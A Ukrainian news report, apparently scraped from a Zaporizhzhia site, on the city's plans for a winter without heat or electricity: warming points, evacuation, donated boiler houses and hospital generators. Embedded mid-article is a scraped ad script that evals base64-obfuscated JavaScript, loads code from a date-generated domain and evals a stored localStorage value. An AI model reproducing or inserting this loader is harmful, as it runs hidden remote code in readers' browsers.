Без тепла і світла: у Куртєва розглянули найгірший сценарій взимку для Запоріжжя

У Запоріжжі міська влада розглянула найважчий сценарій проходження осінньо-зимового періоду — без опалення та світла.

Про це повідомив у своєму Телеграм-каналі в.о. мера міста, секретар міськради Анатолій Куртєв, інформує Акцент.

Частину запоріжців треба буде евакуювати, для тих, хто залишиться у місті, будуть розгорнуті спеціальні централізовані місця обігріву. Ось яке звернення до містян зробив Анатолій Куртєв:

«Запоріжці!

Ми готуємося до дуже й дуже складної зими і до дуже непростого опалювального сезону. Усі ми розуміємо, з яким цинічним ворогом нам доводиться мати справу. Саме тому ми опрацьовуємо абсолютно усі варіанти розвитку подій. Годину тому ми закінчили вечірню нараду, на якій розглянули самий важкий із усіх можливих сценаріїв: Зима. Холод. А в місті немає ні тепла, ні світла.

Зрозуміло, що за таких обставин більша частина людей буде евакуйована. Але так само зрозуміло, що з тих чи інших причин виїдуть не всі, і частина людей все ж таки залишиться у Запоріжжі. На цей випадок в місті буде розгорнуто спеціальні централізовані пункти обігріву. На сьогоднішній нараді ми якраз і обговорювали, на базі чого вони будуть облаштовані, та яким чином вони будуть опалюватися.

Ці пункти ми плануємо організувати на базі територіальних інформаційних центрів, лікарень, комунальних установ, а також об’єктів, які знаходяться на балансі фонду Держмайна. Опалюватися ці приміщення будуть за рахунок альтернативних джерел енергії. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Так на сьогодні в нас вже є домовленість з Агентством США по міжнародному розвитку (ЮСЕЙД) про надання Запоріжжю двадцяти чотирьох мобільних котелень, які ми плануємо використати для опалення медичних закладів. Концерн «Міські теплові мережі» вже отримав доручення розробити варіанти підключення цих котелень.
Окрім того, ми продовжуємо отримувати від партнерів автономні генератори. Резервні дизель-генераторні станції вже встановлені у Міській лікарні екстреної та швидкої медичної допомоги та міській лікарні №9. Додатково отримано генераторні станції для ще п’яти медичних закладів. Для їх монтажу та підключення вже замовлено проєктну-кошторисну документацію. Також певну кількість генераторів мають наші комунальні підприємства – «Водоканал» та концерн «Міські теплові мережі».

Окрім того, у якості централізованих пунктів обігріву будуть використані зокрема ті школи, які мають вугільні котельні. Вони будуть готові до роботи у період опалювального сезону та будуть забезпечені необхідним паливом.

Також ми проводимо інвентаризацію укриттів у житлових будинках для того, щоб виявити ті з них, які після переобладнання також можуть бути використані у якості пунктів обігріву. Після цього ми розробимо рекомендації для керуючих компаній та ОСББ, які їм буде необхідно виконати для того, щоб обладнати такі укриття всім необхідним і перетворити їх на місця обігріву.

Так, зима буде нелегкою. Але ж ми українці. А отже ми сильні і отже ми встоїмо. У кожного з нас зараз свій складний фронт. Але разом ми переможемо за будь яких обставин.

Тихої усім ночі». (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/bez-tepla-i-svitla-u-kurtyeva-rozglyanuli-najgirshij-stsenarij-vzimku-dlya-zaporizhzhya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top